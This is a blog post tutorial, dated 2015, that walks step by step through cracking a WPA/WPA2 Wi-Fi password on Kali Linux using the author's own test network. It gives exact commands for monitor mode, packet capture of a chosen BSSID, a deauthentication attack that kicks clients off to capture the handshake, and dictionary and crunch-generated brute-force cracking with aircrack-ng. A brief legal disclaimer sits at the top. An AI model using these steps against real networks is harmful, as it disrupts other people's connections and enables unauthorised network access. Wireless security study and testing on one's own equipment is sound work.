Monday, 30 November 2015


WPA/WPA2  wifi cracking-

This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1-
In this tutorial, I am going to hack a wifi that I just setup ,named –7 star. Now we have kali linux,open the terminal window & type  in “ifconfig” .This going to  show list all the networking interfaces connected to your device.
Here, I only need (wlan0) which is my wifi card,so I disable the others  interface. By doing -
Ifconfig  <name of interface > down
Eg. Ifconfig  eth0  down. ---by doing this eth0 interface will be disable.

lo  interface doesnot matter ,so remain as it is. 

After  doing so,type again ifconfig  in the terminal,for just check the eth0 interface was disable or not.

Step 2-
Now  switch on the monitor mode by  typeing in the terminal , airmon-ng  start  wlan0

"airmon-ng”  is just a tool for monitoring  air traffic. While “start” is basically start the tool & “wlan0” specifies the interface we are using for  monitoring.
It probably shows  some process that could cause trouble ,so we will kill those process by entering or typeing in the terminal--->
kill  <process ID>
 here my process id is 2615 ,2637,3581,3675  etc. that could cause trouble. So I type in the terminal,
   Kill 2615
   Kill 2637
  Kill 3581  …..etc 

you do “ifconfig” ,it should show us the newly made monitoring interface i.e. “mon0”

Step  3-
Now type ,airodump-ng  mon0

It  will shows the all visible nearby networks. The moment you see the your network  press  ctrl+ C to cancel the dumping. & note down the bssid & channel no of victim n/w.
Here, BSSID --The mac address of the  victim network.

           CH (-c) -- channel number of victim n/w.

            airodump-ng --tool for capturing wifi packets

           (-w) --write the filename.

Now  I identified the victim network. That is shown in following fig.  highlight in white colour. After  The moment you see the your network  press  ctrl+ C to cancel the dumping. & note down the bssid & channel no of victim n/w.

Step -4
start capturing  all the packets related to the specific  network  &  store the data in the file. 
airodump-ng   --bssid  <bssid number>  -c  <channel no>  -w <file name>  <interface>
here,my  victim n/w  bssid number --28:C6:8E:D9:17:77 & channel no -- 5  

airodump-ng    --bssid  28:C6:8E:D9:17:77  -c  5  -w  handshake  mon0

here,”handshake” is the filename. For our conviniance.

Step  5-
Don’t close the terminal  open the new terminal &  disconnect all the existing client ,so that they try to reconnect  & we get the WPA  handshake in the terminal one.
 aireplay-ng  --deauth  10  -a  <bssid number>  mon0
aireplay-ng  --deauth  10  -a  28:C6:8E:D9:17:77  mon0
Now,you must see a handshake  captured on top right corner  of terminal  one. If you not see …then run the command again.
Note that--
 don’t  do the deauth 0 , as if done  the deauth will not stop  & nobody will be able to connect  that wifi  
Now,once you  done the handshake  you can close the terminal  one ,the handshake is now stored in the file named as (handshake-01.cap)
Note  that --
  if  you run the airodump-ng  command 2 times  with the same file name ,then file name will change to  filename-02.cap  & so on….

Step 6--

If you type “ls “ command you can clearly see  so many files ,but  we need only handshake-01.cap .

Step  7--
Now  we  want  to  find the key.  For that 2 ways  --

1. Dictionary attack (brute forceing)--
 Syntax --
  aircrack-ng  -w   <dictionary path>   <file name path>
Eg-- in this case my both dictionary & files  are in home folder. So I just type-->
aircrack-ng   -w  rockyou.txt   handshake-01.cap

Now  it can  autonatically bruteforcing…..but  it takes  some times ....
Way ---2  --->
Generate  the dictionary  using crunch  command.
Syntax --
 crunch  <minlength>  <maxlength>  <character>  -o outputfilename.txt
crunch  12  12  0123456789 | aircrack-ng  -b  <bssid number>  <filename>  -w  -
note --
 if the symbol  is used in the crunch that put into  inverted commas (‘  ‘)

Now it will automatically scan the password...

It takes some times & finally you get password.

&  it works ….:)